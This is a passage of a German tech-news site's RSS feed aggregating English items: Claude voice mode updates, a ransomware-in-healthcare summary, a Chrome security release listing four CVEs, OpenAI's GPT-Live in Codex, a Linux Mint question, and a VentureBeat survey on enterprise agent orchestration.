<link>https://tsecurity.de/de/3690931/ios-mac-os/anthropic-upgrades-claude-voice-mode-with-opus-and-sonnet-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690931/ios-mac-os/anthropic-upgrades-claude-voice-mode-with-opus-and-sonnet-support/</guid>
<pubDate>Fri, 24 Jul 2026 09:40:42 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Claude voice mode now supports Anthropic’s Opus and Sonnet models, giving users access to stronger reasoning and more capable responses during spoken conversations. Until now, voice mode only worked with the faster Haiku model, which focused more on speed than deeper analysis.







The upgrade brings Claude’s voice experience closer to the intelligence already available through text chats. Paid users can now use the more advanced models while speaking, which should make voice conversations more useful for research, planning, writing, and detailed questions.




https://www.youtube.com/watch?v=GWnNMfFivnk




Claude voice mode gets model switching and connectors



Anthropic also lets users switch between models while using voice mode, so they can choose a faster or more capable option based on the task. Voice mode now works with connectors as well, allowing Claude to interact with supported tools and services during a conversation.



The updated voice mode supports 11 languages:




English



French



German



Hindi



Indonesian



Italian



Japanese



Korean



Portuguese in Brazil



Spanish in Latin America



Spanish in Spain




Users can also switch between supported languages during the same voice session. Claude voice mode is available through Anthropic’s mobile, desktop, and web apps, making the upgraded experience accessible across major platforms.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware gangs go after EMEA healthcare’s supply chain]]></title>
<description><![CDATA[A ransomware attack against a hospital makes headlines, while attacks on the rest of the ecosystem around it tend to stay quiet despite doing damage that can be just as bad. Flare researcher Assaf Morag analyzed ransomware leak-site activity tied to healthcare organizations in the EMEA region bet...]]></description>
<link>https://tsecurity.de/de/3690763/it-security-nachrichten/ransomware-gangs-go-after-emea-healthcares-supply-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690763/it-security-nachrichten/ransomware-gangs-go-after-emea-healthcares-supply-chain/</guid>
<pubDate>Fri, 24 Jul 2026 07:41:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A ransomware attack against a hospital makes headlines, while attacks on the rest of the ecosystem around it tend to stay quiet despite doing damage that can be just as bad. Flare researcher Assaf Morag analyzed ransomware leak-site activity tied to healthcare organizations in the EMEA region between 2024 and 2026, and found that ransomware groups are going after the entire healthcare supply chain. The dataset covers hospitals and clinics, telemedicine providers, diagnostic laboratories, pharmacies, … <a href="https://www.helpnetsecurity.com/2026/07/24/emea-healthcare-ransomware-activity/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/24/emea-healthcare-ransomware-activity/">Ransomware gangs go after EMEA healthcare’s supply chain</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Study Found Asthma Improves After Switching From a Gas Stove to Electric]]></title>
<description><![CDATA[Gas stoves are a source of indoor air pollution. New evidence shows how much they may affect people with respiratory issues.]]></description>
<link>https://tsecurity.de/de/3690489/it-nachrichten/a-study-found-asthma-improves-after-switching-from-a-gas-stove-to-electric/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690489/it-nachrichten/a-study-found-asthma-improves-after-switching-from-a-gas-stove-to-electric/</guid>
<pubDate>Fri, 24 Jul 2026 02:25:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gas stoves are a source of indoor air pollution. New evidence shows how much they may affect people with respiratory issues.]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 150.0.7871.186/.187 for Windows and Mac and 150.0.7871.186 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogSecurity Fixes and RewardsNote: Access to bug details and links may be kept rest...]]></description>
<link>https://tsecurity.de/de/3690353/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690353/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Fri, 24 Jul 2026 00:27:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 150.0.7871.186/.187 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.186 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.182..150.0.7871.186?pretty=fuller&amp;n=10000">Log</a></span></p><div><span face="Arial,sans-serif"><br><p dir="ltr"><span>Security Fixes and Rewards</span></p><p dir="ltr"><span>Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.</span></p><br><p dir="ltr"><span>This update includes </span><a href="https://issues.chromium.org/issues?q=customfield1223088:5-M150"><span>4</span></a><span> security fixes. Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span>Chrome Security Page</span></a><span> for more information.</span></p><p dir="ltr"><span><br></span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/518237034"><span>518237034</span></a><span>]</span><span> High </span><span>CVE-2026-16807: Out of bounds write in Codecs. </span><span>Reported by Google on 2026-05-30</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/522064153"><span>522064153</span></a><span>]</span><span> High </span><span>CVE-2026-16806: Use after free in WebMCP. </span><span>Reported by Google on 2026-06-10</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/523292588"><span>523292588</span></a><span>]</span><span> High </span><span>CVE-2026-16805: Use after free in Blink. </span><span>Reported by Google on 2026-06-12</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/524721670"><span>524721670</span></a><span>]</span><span> High </span><span>CVE-2026-16804: Use after free in Input. </span><span>Reported by Google on 2026-06-16</span></p><p dir="ltr"><span><br></span></p><p dir="ltr"><span>We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></p><p dir="ltr"><span><br></span></p><p dir="ltr"><span>Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span>AddressSanitizer</span></a><span>, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span>MemorySanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span>UndefinedBehaviorSanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span>Control Flow Integrity</span></a><span>, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span>libFuzzer</span></a><span>, or </span><a href="https://github.com/google/afl"><span>AFL</span></a><span>.</span></p><br></span></div><div><span face="Arial,sans-serif"><br></span></div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p><div><span><br></span></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic coding goes hands free as OpenAI brings GPT-Live's full duplex voice control to Codex and ChatGPT on the desktop]]></title>
<description><![CDATA[Two weeks after debuting its more naturalistic GPT-Live audio AI model with full-duplex capabilities (listening and speaking at the same time), OpenAI is bringing it directly into developer workflows. The company announced that GPT-Live now powers the ChatGPT desktop application on macOS and Wind...]]></description>
<link>https://tsecurity.de/de/3690348/it-nachrichten/agentic-coding-goes-hands-free-as-openai-brings-gpt-lives-full-duplex-voice-control-to-codex-and-chatgpt-on-the-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690348/it-nachrichten/agentic-coding-goes-hands-free-as-openai-brings-gpt-lives-full-duplex-voice-control-to-codex-and-chatgpt-on-the-desktop/</guid>
<pubDate>Fri, 24 Jul 2026 00:20:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two weeks after debuting its <a href="https://venturebeat.com/technology/openai-launches-gpt-live-a-full-duplex-voice-upgrade-that-lets-chatgpt-talk-more-like-a-person">more naturalistic GPT-Live audio AI model</a> with full-duplex capabilities (listening and speaking at the same time), OpenAI is bringing it directly into developer workflows. </p><p>The company announced that <a href="https://x.com/OpenAI/status/2080378182469857576">GPT-Live now powers the ChatGPT desktop application</a> on macOS and Windows, integrating directly with agentic systems like Codex and ChatGPT Work (which are separate experiences available in the ChatGPT desktop app). </p><p>When OpenAI initially launched GPT-Live on July 8, 2026, it introduced a continuous audio model capable of listening and speaking simultaneously—eliminating rigid turn-taking while delegating complex reasoning to background models like GPT-5.5. </p><p>Today's release expands that conversational layer to technical tasks, enabling software engineers to orchestrate multi-threaded coding jobs, review pull requests, and debug applications using natural voice commands.</p><p>As such, it could usher in a new era of "hands free" software development and even live, in-person group coding parties for <a href="https://openai.com/index/codex-for-knowledge-work/">Codex's more than 5 million weekly active users</a>. Codex, of course, is the name given to OpenAI's models and harness focused on coding, but which the company has this year expanded into a more <a href="https://venturebeat.com/technology/openai-drastically-updates-codex-desktop-app-to-use-all-other-apps-on-your-computer-generate-images-preview-webpages">general productivity platform. </a>An OpenAI spokesperson told VentureBeat this is the first time voice activation has been included natively with Codex on the desktop. </p><p>OpenAI posted a <a href="https://youtu.be/E0ZMOschrTU?si=WWc8fZ2o0UtxrDFk">promotional video</a> showing some of its employees, Codex developer experience engineer Jason Liu and Codex technical staffer Guinness Chen, speaking to the same ChatGPT desktop app session in the same room, each issuing different instructions and conversing with the same model. </p><div></div><h2><b>New capabilities unlocked</b></h2><p>At its core, this integration relies on decoupling the real-time voice layer from the underlying execution engines.</p><p>While GPT-Live maintains fluid conversation—inserting natural verbal acknowledgments like "got it" without interrupting the user—it passes heavy computational workloads to background reasoning models. </p><p>On macOS, the desktop application incorporates "Appshots" and screen context features, allowing ChatGPT Voice to analyze the frontmost window alongside local files, codebase structures, and active plugins.</p><p>This architecture creates a pair-programming dynamic where developers talk through problems conversationally while agents execute tasks asynchronously. </p><p>Rather than manually stopping coding sessions to type detailed instructions or switch windows, developers direct the system hands-free. </p><p>The full-duplex engine dynamically decides when to speak, pause, or invoke tools, maintaining conversational state even as background agents process complex code modifications.</p><h2><b>Directing coding and complex builds with your voice alone</b></h2><p>The central operational capability in this update centers on multi-task execution across Codex and ChatGPT Work environments. </p><p>Software engineers can initiate multiple concurrent task threads from a single spoken prompt. For instance, a developer preparing to ship a feature can instruct the system to investigate an open authentication bug, review a pending API migration pull request, and generate missing unit tests simultaneously.</p><p>The desktop application coordinates these actions across disparate contexts, tracing issues through Slack conversations, GitHub repositories, and local codebases.</p><p>Developers can also verbally convert design mockups into working code, splitting tasks across frontend, backend, and testing layers. </p><p>With support for multi-folder projects (build 26.715) and remote execution via iOS, engineers can check task progress, answer agent prompts, and redirect active jobs without switching applications or managing individual processes line by line.</p><h2><b>Proprietary license</b></h2><p>OpenAI’s voice-enabled desktop release operates under a proprietary, commercial enterprise model. Access is restricted to paid subscribers across Plus, Pro, Business, Enterprise, and Education plans.</p><p>For individual developers and corporate engineering departments, this commercial structure means the model weights, voice processing pipelines, and agent state architectures remain fully closed. </p><p>Organizations cannot modify or self-host the underlying systems. Furthermore, tasks initiated via ChatGPT Voice consume standard usage allocations directly from existing Codex and ChatGPT Work plan quotas, treating voice-triggered actions identically to standard agentic workloads.</p><h2><b>Community reactions</b></h2><p>Developer communities immediately noted the implications of bringing continuous full-duplex voice to autonomous coding workflows. </p><p>Reacting to the build 26.715 release announcement—which details voice integration and multi-folder project support—AI Insider journalist <a href="https://x.com/ChrisGPT/status/2080375250139693293">@ChrisGPT noted on X</a>: "Today OpenAI will release voice and remote guidance for codex ! One step closer to personal AGI". </p><p>Early technical feedback highlights widespread enthusiasm for orchestrating complex agentic tasks hands-free, particularly when stepping away from the workstation or managing build pipelines remotely.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are Linux Mint's Default Apps Too Outdated for Everyday Use?]]></title>
<description><![CDATA[Did anyone in this community watched this video? The creator claims that Linux Mint, along with many LTS Linux distributions, often ships older versions of software, especially default apps like Calendar, Mail, Calculator, etc. He mentions Mint several times throughout the video. The video is fro...]]></description>
<link>https://tsecurity.de/de/3690331/linux-tipps/are-linux-mints-default-apps-too-outdated-for-everyday-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690331/linux-tipps/are-linux-mints-default-apps-too-outdated-for-everyday-use/</guid>
<pubDate>Fri, 24 Jul 2026 00:13:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Did anyone in this community watched this <a href="https://youtu.be/1ebkQq5TcMw?si=YD6V0yDXZxFFgLqe">video</a>? The creator claims that Linux Mint, along with many LTS Linux distributions, often ships older versions of software, especially default apps like Calendar, Mail, Calculator, etc. He mentions Mint several times throughout the video.</p> <p>The video is from <strong>The Linux Experiment</strong>, which seems to be a well-known YouTube channel with nearly half a million subscribers.</p> <p>I came across this video just before switching from Windows to Linux Mint, and it made me a bit hesitant.</p> <p>As a regular user, it feels like there's no easy way to know whether we're using the latest and safest versions of these built-in apps. For example, if we connect our Google or Apple Calendar account to an older calendar app, could that create a security risk? The same concern applies to email clients, we don't know if we're using the latest and most secure version.</p> <p>Most regular users don't have the time or technical knowledge to manually check every application's version or update software outside the normal update process. We generally expect the operating system to keep essential apps secure and up to date.</p> <p>Am I misunderstanding how Linux Mint and other LTS distributions handle software updates and security? I'd appreciate hearing from people with more experience.</p> <p><a href="https://preview.redd.it/eqwhcsz67xeh1.jpg?width=365&amp;format=pjpg&amp;auto=webp&amp;s=3afc46c4597b33d1436a64a7ff3a5ffa9dcc7a4d">https://preview.redd.it/eqwhcsz67xeh1.jpg?width=365&amp;format=pjpg&amp;auto=webp&amp;s=3afc46c4597b33d1436a64a7ff3a5ffa9dcc7a4d</a></p> <p><a href="https://preview.redd.it/are-linux-mints-default-apps-too-outdated-for-everyday-use-v0-bs4cq3ue4xeh1.jpg?width=365&amp;format=pjpg&amp;auto=webp&amp;s=1e3ab85d7a6c369d1c10a2675a848e3e4b33d84a"></a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/EFG4567"> /u/EFG4567 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v45adu/are_linux_mints_default_apps_too_outdated_for/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v45adu/are_linux_mints_default_apps_too_outdated_for/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Nearly seven in 10 plan to switch — and the biggest group of movers has no shortlist </h2><p>The strategic change enterprises anticipate (previous finding) comes with vendor motion attached. Asked whether they plan to adopt a new, additional, or replacement agent orchestration platform in the next twelve months, more respondents are moving here than in any other layer we track.</p><div></div><p>Asked which platforms they are considering, the most common answer among those in motion is none yet: 29% of all respondents are evaluating without a shortlist, the largest single response after "not considering a change." Among named candidates, OpenAI leads at 16%, followed by LangChain/LangGraph at 12% and Anthropic at 7% — and notably, the independent frameworks draw roughly double their current usage footprint in forward consideration, the same pattern our security tracker found for specialist vendors. Read with this report's concentration and lock-in findings, the picture completes itself: the major model-platform providers hold roughly four-fifths of today's primary usage, vendor lock-in has become the leading fear, 96% anticipate a strategic change — and now the purchase intent to act on all of it, with the largest bloc of buyers still undecided. The most concentrated layer of the agentic stack is also, as of June, the least settled.</p><h2>Finding 6: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 7: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 8: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 9: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing — for now — on model-provider platforms, which collectively hold roughly four-fifths of primary usage, chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane they expect is deliberately hybrid, because vendor lock-in is the risk they fear most. But the standardization is provisional: 68% plan to adopt a new, additional, or replacement orchestration platform within twelve months — the highest switching intent of any layer we track — and the largest group of those movers has not yet shortlisted a candidate. Today's concentration describes where enterprises are, and visibly does not describe where they intend to stay.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed "agents" are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The questions for subsequent waves are whether the deployed reality closes the gap on the ambition — and, with nearly seven in ten buyers in motion and most of them undecided, which platforms the settled stack finally lands on.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI context gap: Enterprise AI organizations have a trust problem, not a retrieval problem — and most are still building the fix]]></title>
<description><![CDATA[Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define...]]></description>
<link>https://tsecurity.de/de/3689828/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689828/it-nachrichten/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
